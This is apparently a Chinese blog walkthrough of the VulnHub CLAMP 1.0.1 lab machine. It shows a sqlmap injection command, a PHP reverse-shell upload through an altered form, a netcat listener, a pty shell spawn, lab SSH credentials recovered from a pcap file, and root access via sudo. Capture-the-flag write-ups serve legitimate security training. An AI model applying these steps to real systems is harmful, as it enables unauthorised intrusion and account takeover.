【vulnhub】CLAMP 1.0.1靶机

信息收集

靶机发现

端口扫描

页面访问,并查看源码

访问 /nt4stopc/,下面有一些问题,提示必须收集答案

一些判断题,对与错对应1与0,最后结果为0110111001,拼接访问

点击图中位置,发现存在参数,php语言,尝试注入

是存在注入的,使用 sqlmap 跑一下

复制代码
python3 sqlmap.py -u "http://192.168.93.162/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

gereksiz 下得到一串值:

hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php

解码后得到:

uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

可能是路径,拼接访问

复制代码
http://192.168.93.162/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

再拼接 upload.php

文件上传,以md5提交,但是没有提交按钮,自己在前端给加一个

<input type="submit">

获取shell

kali 生成反弹 shell

复制代码
locate php-reverse-shell.php
 
cp /usr/share/webshells/php/php-reverse-shell.php .
 
vim php-reverse-shell.php

上传该文件后,返回了文件路径,文件名为md5加密后的

nc监听,访问文件,成功反弹shell

提权

复制代码
python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下发现 important.pcapng,查看文件,发现内容

url解码,得到以下数据

复制代码
email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work
 
账号密码:
mkelepce:mklpc-osas112.

ssh连接,连接成功

查看权限

sudo su 提权成功

相关推荐
没有bug.的程序员17 分钟前
JVM 安全与沙箱深度解析
java·jvm·安全·gc·gc调优
爱思德学术30 分钟前
中国计算机学会(CCF)推荐学术会议-C(网络与信息安全):ACNS 2026
网络安全·密码学
云计算练习生41 分钟前
渗透测试行业术语扫盲(第十三篇)—— 安全运营与审计类
网络·安全·网络安全·信息安全·渗透测试术语
00后程序员张1 小时前
IPA 混淆技术全解,从成品包结构出发的 iOS 应用安全实践与工具组合
android·安全·ios·小程序·uni-app·cocoa·iphone
pandarking1 小时前
[CTF]攻防世界:fakebook (sql注入)
数据库·sql·web安全·网络安全
sg_knight1 小时前
Docker Engine 升级指南:保障容器安全的关键步骤
java·spring boot·安全·spring·spring cloud·docker·容器
安科瑞小许1 小时前
用户侧新能源并网:如何实现安全高效的“防逆流”运行
安全·能源·新能源·并网·防逆流
liebe1*11 小时前
第十四章 网络安全方案设计
安全·web安全
Whoami!1 小时前
❽⁄₆ ⟦ OSCP ⬖ 研记 ⟧ 修改漏洞利用脚本 ➱ 修改缓冲区偏移量
网络安全·信息安全·缓冲区溢出·程序断点调试
胡萝卜3.01 小时前
构建安全的C++内存管理体系:从RAII到智能指针的完整解决方案
运维·开发语言·c++·人工智能·安全·智能指针·raii